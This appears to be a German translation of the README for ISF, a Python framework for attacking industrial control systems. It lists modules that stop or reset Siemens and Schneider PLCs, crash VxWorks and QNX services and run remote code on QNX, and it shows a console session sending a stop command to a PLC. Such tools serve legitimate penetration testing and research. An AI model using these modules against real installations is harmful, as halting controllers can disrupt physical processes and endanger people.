ISF (Industrial Exploitation Framework) ist ein auf Python basierendes Exploitation-Framework, das dem Metasploit-Framework ähnelt.
ISF basiert auf dem Open-Source-Projekt routersploit.
Lesen Sie dies in anderen Sprachen: Englisch, 简体中文,
Der Einsatz von ISF zum Angriff auf Ziele ohne vorherige gegenseitige Zustimmung ist illegal. Es liegt in der Verantwortung des Endbenutzers, alle geltenden lokalen, staatlichen und bundesstaatlichen Gesetze einzuhalten. Die Entwickler übernehmen keine Haftung und sind nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Programm verursacht werden.
Name | Weg | Beschreibung |
---|---|---|
modbus_tcp_client | icssploit/clients/modbus_tcp_client.py | Modbus-TCP-Client |
wdb2_client | icssploit/clients/wdb2_client.py | WdbRPC Version 2-Client (Vxworks 6.x) |
s7_client | icssploit/clients/s7_client.py | s7comm-Client (S7 300/400 SPS) |
Name | Weg | Beschreibung |
---|---|---|
s7_300_400_plc_control | Exploits/plcs/siemens/s7_300_400_plc_control.py | S7-300/400 SPS Start/Stopp |
s7_1200_plc_control | Exploits/plcs/siemens/s7_1200_plc_control.py | S7-1200 SPS starten/stoppen/reset |
vxworks_rpc_dos | Exploits/plcs/vxworks/vxworks_rpc_dos.py | Vxworks RPC-Remote-Dos (CVE-2015-7599) |
Quantum_140_plc_control | Exploits/plcs/schneider/quantum_140_plc_control.py | SPS-Start/Stopp der Serie Quantum 140 von Schneider |
crash_qnx_inetd_tcp_service | Exploits/plcs/qnx/crash_qnx_inetd_tcp_service.py | QNX Inetd TCP-Dienst dos |
qconn_remote_exec | Exploits/plcs/qnx/qconn_remote_exec.py | QNX qconn Remote-Codeausführung |
profinet_set_ip | Exploits/plcs/siemens/profinet_set_ip.py | IP-Konfiguration des Profinet DCP-Geräts |
Name | Weg | Beschreibung |
---|---|---|
profinet_dcp_scan | scanners/profinet_dcp_scan.py | Profinet DCP-Scanner |
vxworks_6_scan | scanners/vxworks_6_scan.py | Vxworks 6.x-Scanner |
s7comm_scan | scanners/s7comm_scan.py | S7comm-Scanner |
enip_scan | scanners/enip_scan.py | EthernetIP-Scanner |
Dieses Protokoll kann in anderen Fuzzing-Frameworks wie Kitty verwendet werden oder Sie können Ihren eigenen Client erstellen.
Name | Weg | Beschreibung |
---|---|---|
pn_dcp | icssploit/protocols/pn_dcp | Profinet DCP-Protokoll |
modbus_tcp | icssploit/protocols/modbus_tcp | Modbus TCP-Protokoll |
wdbrpc2 | icssploit/protocols/wdbrpc2 | WDB RPC Version 2-Protokoll |
s7comm | icssploit/protocols/s7comm.py | S7comm-Protokoll |
git clone https://github.com/dark-lbp/isf/
cd isf
python isf.py
root@kali:~/Desktop/temp/isf# python isf.py
_____ _____ _____ _____ _____ _ ____ _____ _______
|_ _/ ____|/ ____/ ____| __ | | / __ _ _|__ __|
| || | | (___| (___ | |__) | | | | | || | | |
| || | ___ \___ | ___/| | | | | || | | |
_| || |____ ____) |___) | | | |___| |__| || |_ | |
|__________|_____/_____/|_| |__________/_____| |_|
ICS Exploitation Framework
Note : ICSSPOLIT is fork from routersploit at
https://github.com/reverse-shell/routersploit
Dev Team : wenzhe zhu(dark-lbp)
Version : 0.1.0
Exploits: 2 Scanners: 0 Creds: 13
ICS Exploits:
PLC: 2 ICS Switch: 0
Software: 0
isf >
isf > use exploits/plcs/
exploits/plcs/siemens/ exploits/plcs/vxworks/
isf > use exploits/plcs/siemens/s7_300_400_plc_control
exploits/plcs/siemens/s7_300_400_plc_control
isf > use exploits/plcs/siemens/s7_300_400_plc_control
isf (S7-300/400 PLC Control) >
Zum Vervollständigen können Sie die Tabulatortaste verwenden.
isf (S7-300/400 PLC Control) > show options
Target options:
Name Current settings Description
---- ---------------- -----------
target Target address e.g. 192.168.1.1
port 102 Target Port
Module options:
Name Current settings Description
---- ---------------- -----------
slot 2 CPU slot number.
command 1 Command 0:start plc, 1:stop plc.
isf (S7-300/400 PLC Control) >
isf (S7-300/400 PLC Control) > set target 192.168.70.210
[+] {'target': '192.168.70.210'}
isf (S7-300/400 PLC Control) > run
[*] Running module...
[+] Target is alive
[*] Sending packet to target
[*] Stop plc
isf (S7-300/400 PLC Control) >
isf (S7-300/400 PLC Control) > show info
Name:
S7-300/400 PLC Control
Description:
Use S7comm command to start/stop plc.
Devices:
- Siemens S7-300 and S7-400 programmable logic controllers (PLCs)
Authors:
- wenzhe zhu
References:
isf (S7-300/400 PLC Control) >